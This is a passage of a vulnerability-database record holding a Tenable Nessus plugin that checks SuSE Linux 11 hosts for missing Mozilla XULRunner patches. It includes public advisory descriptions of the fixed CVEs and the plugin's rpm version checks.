subsequently reused by\n the system it was possible that an attempt to access the\n locationbar property could result in the execution of\n attacker-controlled memory. (MFSA 2010-66 /\n CVE-2010-3180)\n\n - Security researcher regenrecht reported via\n TippingPoint's Zero Day Initiative that when\n window.__lookupGetter__ is called with no arguments the\n code assumes the top JavaScript stack value is a\n property name. Since there were no arguments passed into\n the function, the top value could represent\n uninitialized memory or a pointer to a previously freed\n JavaScript object. Under such circumstances the value is\n passed to another subroutine which calls through the\n dangling pointer, potentially executing\n attacker-controlled memory. (MFSA 2010-67 /\n CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that\n functions used by the Gopher parser to convert text to\n HTML tags could be exploited to turn text into\n executable JavaScript. If an attacker could create a\n file or directory on a Gopher server with the encoded\n script as part of its name the script would then run in\n a victim's browser within the context of the site. (MFSA\n 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a\n web page opened a new window and used a javascript: URL\n to make a modal call, such as alert(), then subsequently\n navigated the page to a different domain, once the modal\n call returned the opener of the window could get access\n to objects in the navigated window. This is a violation\n of the same-origin policy and could be used by an\n attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an\n SSL certificate was created with a common name\n containing a wildcard followed by a partial IP address a\n valid SSL connection could be established with a server\n whose IP address matched the wildcard range by browsing\n directly to the IP address. It is extremely unlikely\n that such a certificate would be issued by a Certificate\n Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch\n Mozilla applications on Linux was effectively including\n the current working directory in the LD_LIBRARY_PATH\n environment variable. If an attacker was able to place\n into the current working directory a malicious shared\n library with the same name as a library that the\n bootstrapping script depends on the attacker could have\n their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an\n exploit targeting particular versions of Firefox 3.6 on\n Windows XP that Telenor found while investigating an\n intrusion attempt on a customer network. The underlying\n vulnerability, however, was present on both the Firefox\n 3.5 and Firefox 3.6 development branches and affected\n all supported platforms. (MFSA 2010-73 / CVE-2010-3765)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3170.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3557 / 3558 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)", "type": "nessus", "viewCount": 4}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:36:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This update brings the Mozilla XULRunner engine to version 1.9.1.15, fixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer. (MFSA 2010-65 / CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory. (MFSA 2010-66 / CVE-2010-3180)\n\n - Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.__lookupGetter__ is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site. (MFSA 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript: URL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms. (MFSA 2010-73 / CVE-2010-3765)", "edition": 1, "enchantments": {}, "hash": "15c4f03f4b594bf662d0ec95ef321e6f1ea48e429243943086f972758c2ed251", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c9be8c76b09668e68564aafc37499eff", "key": "references"}, {"hash": "65fe2a93d43070603e05e87f85db8f43", "key": "title"}, {"hash": "96ffa3e5f217475f603a12d5cccf94fe", "key": "href"}, {"hash": "0d10e29d75af6551e75c87d10169a1d2", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "d14d1a96b91092c41434a96e62b67fa1", "key": "published"}, {"hash": "16dfb1899bc96767b30ee77a130bcfbb", "key": "description"}, {"hash": "5b6f3fc076a2d9c6f98e81620afdb872", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "0b19968aa0d749fbb88c80abb37d3520", "key": "cvelist"}, {"hash": "350fe642a6bd00b9726ef9b638f591f0", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=50952", "id": "SUSE_11_MOZILLA-XULRUNNER191-101118.NASL", "lastseen": "2016-09-26T17:24:10", "modified": "2013-11-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "50952", "published": "2010-12-02T00:00:00", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://support.novell.com/security/cve/CVE-2010-3179.html", "http://support.novell.com/security/cve/CVE-2010-3178.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "http://support.novell.com/security/cve/CVE-2010-3180.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://support.novell.com/security/cve/CVE-2010-3183.html", "http://support.novell.com/security/cve/CVE-2010-3170.html", "http://support.novell.com/security/cve/CVE-2010-3175.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://support.novell.com/security/cve/CVE-2010-3765.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://support.novell.com/security/cve/CVE-2010-3177.html", "http://support.novell.com/security/cve/CVE-2010-3182.html", "http://support.novell.com/security/cve/CVE-2010-3176.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html", "https://bugzilla.novell.com/show_bug.cgi?id=653606"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50952);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:11:05 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings the Mozilla XULRunner engine to version 1.9.1.15,\nfixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor\n Bukanov and Josh Soref reported memory safety problems\n that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal\n reported memory safety problems that affected Firefox\n 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that\n passing an excessively long string to document.write\n could cause text rendering routines to end up in an\n inconsistent state with sections of stack memory being\n overwritten with the string data. An attacker could use\n this flaw to crash a victim's browser and potentially\n run arbitrary code on their computer. (MFSA 2010-65 /\n CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was\n possible to access the locationbar property of a window\n object after it had been closed. Since the closed\n window's memory could have been subsequently reused by\n the system it was possible that an attempt to access the\n locationbar property could result in the execution of\n attacker-controlled memory. (MFSA 2010-66 /\n CVE-2010-3180)\n\n - Security researcher regenrecht reported via\n TippingPoint's Zero Day Initiative that when\n window.__lookupGetter__ is called with no arguments the\n code assumes the top JavaScript stack value is a\n property name. Since there were no arguments passed into\n the function, the top value could represent\n uninitialized memory or a pointer to a previously freed\n JavaScript object. Under such circumstances the value is\n passed to another subroutine which calls through the\n dangling pointer, potentially executing\n attacker-controlled memory. (MFSA 2010-67 /\n CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that\n functions used by the Gopher parser to convert text to\n HTML tags could be exploited to turn text into\n executable JavaScript. If an attacker could create a\n file or directory on a Gopher server with the encoded\n script as part of its name the script would then run in\n a victim's browser within the context of the site. (MFSA\n 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a\n web page opened a new window and used a javascript: URL\n to make a modal call, such as alert(), then subsequently\n navigated the page to a different domain, once the modal\n call returned the opener of the window could get access\n to objects in the navigated window. This is a violation\n of the same-origin policy and could be used by an\n attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an\n SSL certificate was created with a common name\n containing a wildcard followed by a partial IP address a\n valid SSL connection could be established with a server\n whose IP address matched the wildcard range by browsing\n directly to the IP address. It is extremely unlikely\n that such a certificate would be issued by a Certificate\n Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch\n Mozilla applications on Linux was effectively including\n the current working directory in the LD_LIBRARY_PATH\n environment variable. If an attacker was able to place\n into the current working directory a malicious shared\n library with the same name as a library that the\n bootstrapping script depends on the attacker could have\n their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an\n exploit targeting particular versions of Firefox 3.6 on\n Windows XP that Telenor found while investigating an\n intrusion attempt on a customer network. The underlying\n vulnerability, however, was present on both the Firefox\n 3.5 and Firefox 3.6 development branches and affected\n all supported platforms. (MFSA 2010-73 / CVE-2010-3765)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3170.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3557 / 3558 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", 